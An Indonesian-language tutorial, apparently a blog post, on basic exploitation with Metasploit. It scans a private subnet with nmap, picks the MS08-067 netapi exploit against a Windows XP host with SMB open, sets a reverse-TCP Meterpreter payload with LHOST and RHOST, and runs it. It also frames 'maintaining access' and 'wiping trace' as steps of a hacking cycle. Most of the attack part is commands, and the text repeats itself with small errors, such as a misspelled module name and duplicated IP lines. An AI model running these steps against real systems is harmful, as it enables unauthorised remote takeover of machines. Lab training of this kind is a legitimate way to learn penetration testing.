Exploitasi adalah sebuah pemanfaatan vulnerable system yang memungkinkan terjadinya remote system oleh user yang tidak terautentikasi. Dalam dunia exploitasi, software yang terkenal untuk exploitasi adalah metasploit.
Exploitasi memang terdengar sulit, namun pengaplikasiannya sangat mudah. Kita cukup mengenal siklus hacker bekerja, yaitu:
1. Information Gathering
2. Vulnerability Assessment
3. Gaining Access
4. Maintaining Access
5. Wiping Trace
Pertama kali, kita harus mencari informasi target. Dalam Backtrack, hal ini bisa dilakukan dengan menggunakan nmap. Untuk memahaminya, gunakan command:
Command ini berfungsi untuk melakukan scanning pada network dengan kisaran IP => 172.16.128.1 sampai 172.16.128.255.
![[Image: finding-host.png]](//4.bp.blogspot.com/-zU1ds0xSFKw/TpTpYgQrPwI/AAAAAAAAAJY/lZ4A-fyiZbo/s1600/finding-host.png)
Terlihat pada hasil scan nmap, ada dua host yang up yaitu:
172.16.128.1 [ip saya]
172.16.128.1 [ip target]
Kemudian langkah selanjutnya adalah melakukan scanning pada host yang up dengan nmap. Command dasarnya adalah:
Jika target host kamu adalah 172.16.129.128, maka gunakan:
![[Image: 445-open.png]](//1.bp.blogspot.com/-OGBq7to3P7Q/TpTpze8Ah_I/AAAAAAAAAJg/Sz_U3H54VIQ/s1600/445-open.png)
Terlihat bahwa host 172.16.129.128 memiliki tiga port yang terbuka yaitu:
135
139
445
Dan menggunakan sistem operasi Windows dengan port 445 yang terbuka. Langkah berikutnya adalah menentukan exploit yang bisa digunakan untuk memicu vulnerability. Untuk melihat exploit yang bisa digunakan, bukalah console metasploit dengan command:
Lalu ketik:
![[Image: show-exploits.png]](//4.bp.blogspot.com/-NyNVtXB3_-0/TpTrsqaXc7I/AAAAAAAAAJo/v06jY_lBpMg/s1600/show-exploits.png)
Untuk sistem operasi Windows XP dengan port 445 yang terbuka, kita bisa menggunakan modul exploit ms08_06_netapi
Gunakan perintah:
![[Image: use-exploit.png]](//4.bp.blogspot.com/-Bka1k5WjL-w/TpTs2xYunEI/AAAAAAAAAJw/LZb2crgcckk/s1600/use-exploit.png)
Setelah itu gunakan payload, sebagai penghubung exploit dengan remote system. Untuk melihat payload yang bisa digunakan, gunakan perintah:
![[Image: show-payloads.png]](//3.bp.blogspot.com/-a1n8oS0Y38c/TpTtsdGwBvI/AAAAAAAAAJ4/hpDVtJtORvE/s1600/show-payloads.png)
![[Image: set-payload.png]](//3.bp.blogspot.com/-7bmW0x9Tbw4/TpTt2z4jszI/AAAAAAAAAKA/_0l0ABZIPgQ/s1600/set-payload.png)
Perintah ini akan membuat exploit berinteraksi dengan meterpreter melalui TCP. Setelah itu, set local remote yang akan dijadikan base exploit. Gunakan commmand:
Perlu diperhatikan, untuk local remote, gunakan IP kita sendiri.
![[Image: set-lhost.png]](//2.bp.blogspot.com/-Dsnk-7ZQ6k8/TpTvSamiN5I/AAAAAAAAAKI/zWPy0vnYSgA/s1600/set-lhost.png)
Kemudian, tentukan remote host atau IP target exploitasi. Gunakan perintah:
Setelah itu, cek kembali dependency modul yang akan diekseskusi dengan menggunakan perintah:
![[Image: show-options.png]](//4.bp.blogspot.com/-_mh5mtxKOug/TpTwK4k0F3I/AAAAAAAAAKY/9tbzUuDqVB4/s1600/show-options.png)
Setelah semua options terisi dengan benar, lakukan eksekusi eksploitasi dengan perintah:
Terlihat bahwa metasploit langsung berinteraksi dengan modul payload meterpreter.
Dengan payload meterpreter yang telah aktif, berarti kita telah berhasil melakukan eksploitasi. Cukup kali ini basic exploitation yang saya sampaikan. Berikutnya akan ada basic meterpreter untuk memahami basic command meterpreter.
Exploitasi memang terdengar sulit, namun pengaplikasiannya sangat mudah. Kita cukup mengenal siklus hacker bekerja, yaitu:
1. Information Gathering
2. Vulnerability Assessment
3. Gaining Access
4. Maintaining Access
5. Wiping Trace
Pertama kali, kita harus mencari informasi target. Dalam Backtrack, hal ini bisa dilakukan dengan menggunakan nmap. Untuk memahaminya, gunakan command:
Code:
nmap 172.16.128.1/24Command ini berfungsi untuk melakukan scanning pada network dengan kisaran IP => 172.16.128.1 sampai 172.16.128.255.
SPOILER: HIDE
![[Image: finding-host.png]](http://4.bp.blogspot.com/-zU1ds0xSFKw/TpTpYgQrPwI/AAAAAAAAAJY/lZ4A-fyiZbo/s1600/finding-host.png)
Terlihat pada hasil scan nmap, ada dua host yang up yaitu:
172.16.128.1 [ip saya]
172.16.128.1 [ip target]
Kemudian langkah selanjutnya adalah melakukan scanning pada host yang up dengan nmap. Command dasarnya adalah:
Code:
nmap [ip-host]Jika target host kamu adalah 172.16.129.128, maka gunakan:
Code:
nmap 172.16.129.128SPOILER: HIDE
![[Image: 445-open.png]](http://1.bp.blogspot.com/-OGBq7to3P7Q/TpTpze8Ah_I/AAAAAAAAAJg/Sz_U3H54VIQ/s1600/445-open.png)
Terlihat bahwa host 172.16.129.128 memiliki tiga port yang terbuka yaitu:
135
139
445
Dan menggunakan sistem operasi Windows dengan port 445 yang terbuka. Langkah berikutnya adalah menentukan exploit yang bisa digunakan untuk memicu vulnerability. Untuk melihat exploit yang bisa digunakan, bukalah console metasploit dengan command:
Code:
msfconsoleLalu ketik:
Code:
msf > show exploitsSPOILER: HIDE
![[Image: show-exploits.png]](http://4.bp.blogspot.com/-NyNVtXB3_-0/TpTrsqaXc7I/AAAAAAAAAJo/v06jY_lBpMg/s1600/show-exploits.png)
Untuk sistem operasi Windows XP dengan port 445 yang terbuka, kita bisa menggunakan modul exploit ms08_06_netapi
Gunakan perintah:
Code:
msf > use exploit/windows/smb/ms08_067_netapiSPOILER: HIDE
![[Image: use-exploit.png]](http://4.bp.blogspot.com/-Bka1k5WjL-w/TpTs2xYunEI/AAAAAAAAAJw/LZb2crgcckk/s1600/use-exploit.png)
Setelah itu gunakan payload, sebagai penghubung exploit dengan remote system. Untuk melihat payload yang bisa digunakan, gunakan perintah:
Code:
msf > show payloadsSPOILER: HIDE
![[Image: show-payloads.png]](http://3.bp.blogspot.com/-a1n8oS0Y38c/TpTtsdGwBvI/AAAAAAAAAJ4/hpDVtJtORvE/s1600/show-payloads.png)
Code:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcpSPOILER: HIDE
![[Image: set-payload.png]](http://3.bp.blogspot.com/-7bmW0x9Tbw4/TpTt2z4jszI/AAAAAAAAAKA/_0l0ABZIPgQ/s1600/set-payload.png)
Perintah ini akan membuat exploit berinteraksi dengan meterpreter melalui TCP. Setelah itu, set local remote yang akan dijadikan base exploit. Gunakan commmand:
Code:
msf exploit(ms08_067_netapi) > set LHOST 172.16.129.1Perlu diperhatikan, untuk local remote, gunakan IP kita sendiri.
SPOILER: HIDE
![[Image: set-lhost.png]](http://2.bp.blogspot.com/-Dsnk-7ZQ6k8/TpTvSamiN5I/AAAAAAAAAKI/zWPy0vnYSgA/s1600/set-lhost.png)
Kemudian, tentukan remote host atau IP target exploitasi. Gunakan perintah:
Code:
msf exploit(ms08_067_netapi) > set RHOST 172.16.129.128SPOILER: HIDE
[img[http://4.bp.blogspot.com/-wB0xtQxkmbQ/TpTvxTgR_6I/AAAAAAAAAKQ/bh7PURnV3gs/s1600/set-rhost.png[/img]
Setelah itu, cek kembali dependency modul yang akan diekseskusi dengan menggunakan perintah:
Code:
msf exploit(ms08_067_netapi) > show optionsSPOILER: HIDE
![[Image: show-options.png]](http://4.bp.blogspot.com/-_mh5mtxKOug/TpTwK4k0F3I/AAAAAAAAAKY/9tbzUuDqVB4/s1600/show-options.png)
Setelah semua options terisi dengan benar, lakukan eksekusi eksploitasi dengan perintah:
Code:
msf exploit(ms08_067_netapi) > exploitTerlihat bahwa metasploit langsung berinteraksi dengan modul payload meterpreter.
Dengan payload meterpreter yang telah aktif, berarti kita telah berhasil melakukan eksploitasi. Cukup kali ini basic exploitation yang saya sampaikan. Berikutnya akan ada basic meterpreter untuk memahami basic command meterpreter.
Posting Komentar